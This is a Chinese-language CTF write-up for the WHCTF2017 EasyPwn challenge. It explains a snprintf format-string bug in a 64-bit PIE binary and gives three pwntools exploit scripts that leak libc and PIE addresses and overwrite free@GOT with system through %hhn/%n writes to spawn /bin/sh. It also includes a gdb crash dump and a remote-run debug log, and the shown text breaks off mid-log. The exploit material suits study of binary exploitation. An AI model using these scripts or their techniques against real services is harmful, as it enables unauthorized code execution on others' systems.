解题思路
基本信息查询
healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0xa00
Start of program headers: 64 (bytes into file)
Start of section headers: 8640 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 9
Size of section headers: 64 (bytes)
Number of section headers: 29
Section header string table index: 28
healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ checksec pwn1
[*] '/home/healer/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
漏洞分析
通过初步分析发现,下面的函数在执行 snprintf() 时存在格式化字符串漏洞:观察栈空间可以发现缓冲区有重叠的部分,利用这个重叠即可构造格式化字符串漏洞利用。
然后通过劫持 free 函数的 got 表项,使其指向 system 函数;最后利用程序的正常执行流程,输入“/bin/sh”并执行另一个功能,即可执行 system("/bin/sh")。
// Decompiler (IDA) output of the vulnerable menu handler; review comments added.
//
// Stack layout as reported by the decompiler (offsets from sp):
//   s  at 0x010 — input buffer, 0x400 bytes (v2 starts at 0x410)
//   v2 at 0x410 — snprintf output buffer, only 0x3E8 bytes before v3
//   v3 at 0x7F8 — 8-byte slot holding the format string ("%s", see below)
//   v4 at 0xBF8 — saved stack-protector canary
// Two length arguments do not match the buffers they target:
//   * read() accepts 0x438 bytes into the 0x400-byte s (0x38 bytes spill into v2);
//   * snprintf() may emit up to 0x7D0 bytes into v2 (memset even clears 0x7E8),
//     but v3 lies only 0x3E8 bytes past the start of v2, so output bytes from
//     offset 0x3E8 onward overwrite the very format string snprintf is parsing —
//     this is the "overlap" the author describes, and why the payloads below
//     use 0x3E8 bytes of filler before their format text.
// Fix: derive every length from the target buffer (sizeof(s), sizeof(v2)) so the
// formatted output can never alias the format string.
__int64 sub_B30()
{
char s; // [sp+10h] [bp-BF0h]@1
char v2; // [sp+410h] [bp-7F0h]@1
__int64 v3; // [sp+7F8h] [bp-408h]@1
__int64 v4; // [sp+BF8h] [bp-8h]@1
v4 = *MK_FP(__FS__, 40LL); // fs:0x28 — stack canary (checksec above: "Canary found")
memset(&s, 0, 0x400uLL);
memset(&v3, 0, 8uLL);
memset(&v2, 0, 0x7E8uLL); // 0x7E8 > the 0x3E8 bytes actually between v2 and v3
LOWORD(v3) = 29477; // 29477 == 0x7325 -> little-endian bytes "%s"
BYTE2(v3) = 0; // NUL terminator: v3 now holds the format string "%s"
puts("Welcome To WHCTF2017:");
read(0, &s, 0x438uLL); // 0x438 > the 0x400 bytes available in s
snprintf(&v2, 0x7D0uLL, (const char *)&v3, &s); // output limit 0x7D0 reaches past v3 (v2 + 0x3E8)
printf("Your Input Is :%s\n", &v2);
return *MK_FP(__FS__, 40LL) ^ v4;
}
漏洞利用脚本
此题的一些思考
这个题做的时候因为已经触发过 free() 函数,所以 free 函数的 got 表项已经写入了真实地址,并且与 system 函数的地址只相差最后三个字节。修改时可以逐个字节修改,也可以逐字修改,只不过逐字修改多一点;也可以第一次写一个字、第二次写一个字节,或者直接一次性修改四个字节,但是后者没有尝试成功。
这个题因为开了地址随机化,所以每一次加载的位置都不一样,获得的 system 函数地址也不一样,因此构造的格式化字符串的具体数值(控制写入字符个数的值)也是不一样的;而指定写入位置的指针在栈中的偏移是可以确定的,所以格式化字符串要动态生成,并且要先泄露进程的加载地址以及函数的加载地址。
可能脚本中的方法略显笨拙,大佬勿喷,汗!!!
逐字节修改方法
# Remote exploit driver for the sub_B30 format-string bug shown above.
# Flow, as encoded in the send/recv sequence below:
#   1. menu option 1 -> positional "%p" leak of a libc return address
#   2. menu option 2 once, with a throwaway name (per the author's note this
#      path calls free(), so free's GOT slot holds a resolved libc address)
#   3. menu option 1 -> positional "%p" leak of a pointer into the PIE image
#   4. three more option-1 rounds, each a "%hhn" write of one byte of free@GOT
#   5. menu option 2 with "/bin/sh" as the name, which (author's analysis)
#      reaches the hijacked free() with the name buffer as its argument
# The argument indices (397, 396, 133) and the 0x3e8 filler are constants
# specific to this binary's stack layout; nothing in the script derives them.
from pwn import *
# from LibcSearcher import *
# Verbose pwntools I/O logging; the transcript at the end of the page is this output.
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']
io = remote("111.200.241.244",48509)
# io = process("./pwn1")
# Local copy of the target's libc; only its symbol table is consulted (symbol distance).
libc = ELF("./libc.so.6")
# libc = ELF("./libc-2.23.so")
# Loaded but never referenced below: the GOT slot offset is hard-coded at free_got_addr.
elf = ELF("./pwn1")
context(arch = "amd64", os = 'linux')
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# gdb.attach(io,"b * 0x555555554c05")
# Leak 1. 0x3e8 bytes of filler place the format text where snprintf's output
# overlaps its own format string (see sub_B30 above): "bb" covers the original
# "%s" and "%397$p" prints variadic slot 397 as a pointer.
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)
io.recvuntil("0x")
# 12 hex digits == a 48-bit user-space address.
libc_start_main = io.recv(12)
# The leaked value is treated as a return address 240 bytes into __libc_start_main
# (frame 6 of the crash backtrace further down the page shows __libc_start_main+240).
libc_start_main = int(b"0x"+libc_start_main,16) - 240
log.info("libc_start_main: "+hex(libc_start_main))
libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
# Symbol distance taken from the local libc copy; only valid if the remote
# service runs the same libc build.
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))
# Disabled alternative: identify the remote libc from the leak instead of shipping a copy.
# libc_searcher = LibcSearcher("__libc_start_main",libc_start_main)
# libc_base = libc_start_main - libc_searcher.dump("__libc_start_main")
# system = libc_base + libc_searcher.dump("system")
# system_real_addr = system
# log.info("system_real_addr: "+hex(system_real_addr))
# Step 2: run the name path once so free() has been called (author's note above).
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# Leak 2: slot 396, one below the libc return address, holds a pointer into the PIE image.
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)
io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))
# Page-align the leak. This equals the image base only if the leaked pointer lies
# in the first page of the mapping (true in the run log: ...c1ada0 -> ...c1a000);
# the script does not check which symbol the pointer actually is.
elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
# Hard-coded offset of free's .got.plt entry in this binary; the slot is writable
# because checksec reports only Partial RELRO.
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))
# [*] system_real_addr: 0x7fc35da95fa0
# [*] system_real_addr: 0x7fef74ad8fa0
# Split off the low three bytes of system's address; per the author's note only
# these differ from the resolved free address, so the upper bytes are left alone.
one_byte = 0x00000000000000FF & system_real_addr
two_byte = (0x000000000000FF00 & system_real_addr) >> 8
three_byte = (0x00000000FF0000 & system_real_addr) >> 16
# +2 is an empirical correction for output already counted when the %hhn fires
# (the preceding "%s" expansion); the successful run at the end of the page
# confirms the resulting byte values.
one_offset = one_byte + 2
two_offset = two_byte + 2
three_offset = three_byte + 2
# Built only for the commented-out debug print below; never sent.
pattern_payload = (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A")
# print(pattern_payload)
# print(one_offset,two_offset,three_offset)
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n"
# Write 1 (lowest byte). The format chunk is padded to exactly 16 bytes so the
# p64 pointer that follows always lands at the same 8-byte-aligned position —
# presumably the one read as argument 133 by "%133$hhn".
payload = b"a"*0x3e8 + (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr)
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│ 0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push r13
# 84:0420│ 0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9
# 0x7ffff7a59f59 <printf_positional+8697> mov word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015> mov byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233
# Write 2 (second byte): same layout, target pointer advanced by one.
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(two_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+1)
io.sendline(payload)
# Write 3 (third byte): target pointer advanced by two.
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(three_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+2)
io.sendline(payload)
# Step 5: with free@GOT redirected, the name path frees "/bin/sh" (author's analysis).
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")
io.interactive()
一字加一字节方法写入脚本
此脚本用于本地关闭地址随机化时的测试,本地调试已成功;方法都是一样的,再加上对地址随机化的处理即可作为有效的 exp。
# Local variant of the exploit (ASLR disabled, per the note above): two writes
# instead of three — a 2-byte "%hn" for the low word of free@GOT, then a 1-byte
# "%hhn" at +2. The leak and menu sequence are the same as in the first script.
# Review note: system_real_addr is computed and logged but never used — the
# padding counts in both write payloads (8098, 167) are hard-coded for the
# author's local environment, so this script is not address-independent as-is.
from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']
# io = remote("220.249.52.134",59762)
io = process("./pwn1")
libc = ELF("./libc.so.6")
# Loaded but never referenced; the GOT slot offset is hard-coded below.
elf = ELF("./pwn1")
context(arch = "amd64", os = 'linux')
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# Breakpoint at a fixed address; only meaningful while the image base is not randomized.
gdb.attach(io,"b * 0x555555554c05")
# Leak 1: libc return address via positional "%p" (see the first script for the layout).
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)
io.recvuntil("0x")
libc_start_main = io.recv(12)
# Treated as __libc_start_main+240 (matches frame 6 of the crash backtrace below).
libc_start_main = int(b"0x"+libc_start_main,16) - 240
log.info("libc_start_main: "+hex(libc_start_main))
libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
# Computed for logging only in this script (see review note at the top).
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))
# Name path once so free() has been called (author's note above the first script).
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# Leak 2: pointer into the PIE image.
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)
io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))
# Page-align; equals the image base only if the leaked pointer is in the first page.
elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
# Hard-coded .got.plt offset of free (writable: Partial RELRO).
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n"
# Write 1: "%hn" stores a 16-bit count into the pointer at argument 133; the
# single "A" pads the format chunk to 16 bytes so the p64 pointer stays aligned.
payload = b"a"*0x3e8 + b"bb%8098c%133$hnA" + p64(free_got_addr)
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│ 0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push r13
# 84:0420│ 0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9
# 0x7ffff7a59f59 <printf_positional+8697> mov word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015> mov byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233
# Write 2: "%hhn" stores one byte at free@GOT + 2.
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%167c%133$hhnA" + p64(free_got_addr+2)
io.sendline(payload)
# Name path with "/bin/sh" reaches the redirected free() (author's analysis).
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")
io.interactive()
直接写入双字脚本
这个方法没有尝试成功:具体写入目标地址时发生了下面所示的错误,估计是一次写入的值太大了,暂时先放着,没有再细看。
# Unsuccessful local variant (ASLR disabled): a single 4-byte "%n" write with a
# hard-coded 128263072-character padding. The leak and menu sequence match the
# first script. As with the second script, system_real_addr is computed and
# logged but never used for the write. The gdb session pasted after this script
# shows the run ending in SIGSEGV at the dword store of this "%n" inside
# printf_positional ("mov dword ptr [rax], r15d"), with RAX holding
# 0x6161616161616161 — i.e. filler bytes rather than the intended pointer.
from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']
# io = remote("220.249.52.134",59762)
io = process("./pwn1")
libc = ELF("./libc.so.6")
# Loaded but never referenced; the GOT slot offset is hard-coded below.
elf = ELF("./pwn1")
context(arch = "amd64", os = 'linux')
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# Fixed-address breakpoint; only meaningful while the image base is not randomized.
gdb.attach(io,"b * 0x555555554c05")
# Leak 1: libc return address via positional "%p".
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)
io.recvuntil("0x")
libc_start_main = io.recv(12)
# Treated as __libc_start_main+240 (frame 6 of the backtrace below).
libc_start_main = int(b"0x"+libc_start_main,16) - 240
log.info("libc_start_main: "+hex(libc_start_main))
libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
# Logged only; the write payload below does not use this value.
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))
# Name path once so free() has been called (author's note above the first script).
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# Leak 2: pointer into the PIE image.
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)
io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))
# Page-align; equals the image base only if the leaked pointer is in the first page.
elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
# Hard-coded .got.plt offset of free (writable: Partial RELRO).
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n"
# Single "%n" (32-bit) write through argument 134; note this chunk is 23 bytes,
# unlike the 16-byte chunks used in the working scripts, so the p64 pointer sits
# at a different position relative to the filler. This is the payload whose
# store faults in the gdb dump below.
payload = b"a"*0x3e8 + b"bb%128263072c%134$nAAAA" + p64(free_got_addr)
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│ 0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push r13
# 84:0420│ 0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9
# 0x7ffff7a59f59 <printf_positional+8697> mov word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015> mov byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233
# Intended final step (never reached in the recorded run).
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")
io.interactive()
'''
pwndbg> watch * 0x555555756018
Hardware watchpoint 2: * 0x555555756018
pwndbg> c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7a59bd6 in printf_positional (s=s@entry=0x7fffffffcf10, format=format@entry=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., readonly_format=readonly_format@entry=0, ap=ap@entry=0x7fffffffd078, ap_savep=ap_savep@entry=0x7fffffffcaa8, done=128264096, nspecs_done=2, lead_str_end=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., work_buffer=0x7fffffffcae0 "x\320\377\377\377\177", save_errno=0, grouping=0x0, thousands_sep=0x7ffff7b99be5 "") at vfprintf.c:2022
2022 vfprintf.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
*RAX 0x6161616161616161 ('aaaaaaaa')
*RBX 0x7fffffffb780 ◂— 0xffffd160
*RCX 0x0
*RDX 0x17
*RDI 0x7ffff7a58bd0 (printf_positional+3696) ◂— mov rsi, qword ptr [r14 + 0x38]
*RSI 0x20
*R8 0x0
*R9 0x6e
*R10 0x6e
*R11 0x0
*R12 0x0
*R13 0x7fffffffcf10 ◂— 0xfbad8001
*R14 0x7fffffffc5b0 ◂— 0xffffffff
*R15 0x7a527a0
*RBP 0x7fffffffc950 —▸ 0x7fffffffcf00 —▸ 0x7fffffffd560 ◂— 0x6161616161616161 ('aaaaaaaa')
*RSP 0x7fffffffb780 ◂— 0xffffd160
*RIP 0x7ffff7a59bd6 (printf_positional+7798) ◂— mov dword ptr [rax], r15d
────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────
► 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
0x7ffff7a59bd9 <printf_positional+7801> jmp printf_positional+1666 <printf_positional+1666>
↓
0x7ffff7a583e2 <printf_positional+1666> mov rax, qword ptr [rbp - 0x478]
0x7ffff7a583e9 <printf_positional+1673> test rax, rax
0x7ffff7a583ec <printf_positional+1676> je printf_positional+1686 <printf_positional+1686>
↓
0x7ffff7a583f6 <printf_positional+1686> test r15d, r15d
0x7ffff7a583f9 <printf_positional+1689> js printf_positional+9059 <printf_positional+9059>
↓
0x7ffff7a5a0c3 <printf_positional+9059> lea rcx, [rip + 0x146816] <0x7ffff7ba08e0>
0x7ffff7a5a0ca <printf_positional+9066> lea rsi, [rip + 0x13fdcb]
0x7ffff7a5a0d1 <printf_positional+9073> lea rdi, [rip + 0x143740]
0x7ffff7a5a0d8 <printf_positional+9080> mov edx, 0x80e
─────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────
00:0000│ rbx rsp 0x7fffffffb780 ◂— 0xffffd160
01:0008│ 0x7fffffffb788 ◂— 0x0
02:0010│ 0x7fffffffb790 —▸ 0x7ffff7fde700 ◂— 0x7ffff7fde700
03:0018│ 0x7fffffffb798 ◂— 0x0
04:0020│ 0x7fffffffb7a0 ◂— 0x555599999999
05:0028│ 0x7fffffffb7a8 ◂— 0x0
... ↓
───────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────
► f 0 7ffff7a59bd6 printf_positional+7798
f 1 7ffff7a5a4b6 vfprintf+822
f 2 7ffff7a83a59 vsnprintf+121
f 3 7ffff7a62942 snprintf+130
f 4 555555554c0a
f 5 555555554cf9
f 6 7ffff7a2d840 __libc_start_main+240
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
'''
脚本执行结果
healer@healer-virtual-machine:~/Desktop/EasyPwn$ python3 exp.py
[+] Opening connection to 111.200.241.244 on port 48509: Done
[DEBUG] PLT 0x1f7f0 realloc
[DEBUG] PLT 0x1f800 __tls_get_addr
[DEBUG] PLT 0x1f820 memalign
[DEBUG] PLT 0x1f850 _dl_find_dso_for_object
[DEBUG] PLT 0x1f870 calloc
[DEBUG] PLT 0x1f8a0 malloc
[DEBUG] PLT 0x1f8a8 free
[*] '/home/healer/Desktop/EasyPwn/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[DEBUG] PLT 0x920 free
[DEBUG] PLT 0x930 puts
[DEBUG] PLT 0x940 write
[DEBUG] PLT 0x950 __stack_chk_fail
[DEBUG] PLT 0x960 printf
[DEBUG] PLT 0x970 snprintf
[DEBUG] PLT 0x980 memset
[DEBUG] PLT 0x990 read
[DEBUG] PLT 0x9a0 __libc_start_main
[DEBUG] PLT 0x9b0 malloc
[DEBUG] PLT 0x9c0 setvbuf
[DEBUG] PLT 0x9d0 atoi
[DEBUG] PLT 0x9e0 __isoc99_scanf
[DEBUG] PLT 0x9f0 __gmon_start__
[DEBUG] PLT 0x9f8 __cxa_finalize
[*] '/home/healer/Desktop/EasyPwn/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[DEBUG] Received 0x11 bytes:
b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x421 bytes:
b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
b'0x7fbf673df830\n'
b'\n'
b'Input Your Code:\n'
[*] libc_start_main: 0x7fbf673df740
[*] libc_start_main_libc: 0x20740
[*] system_addr: 0x45390
[*] system_real_addr: 0x7fbf67404390
[DEBUG] Sent 0x2 bytes:
b'2\n'
[DEBUG] Received 0x11 bytes:
b'Input Your Name:\n'
[DEBUG] Sent 0x7 bytes:
b'healer\n'
[DEBUG] Received 0x20 bytes:
b'OK!I Know Your Name :healer\n'
b'Now!'
[DEBUG] Received 0x11 bytes:
b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
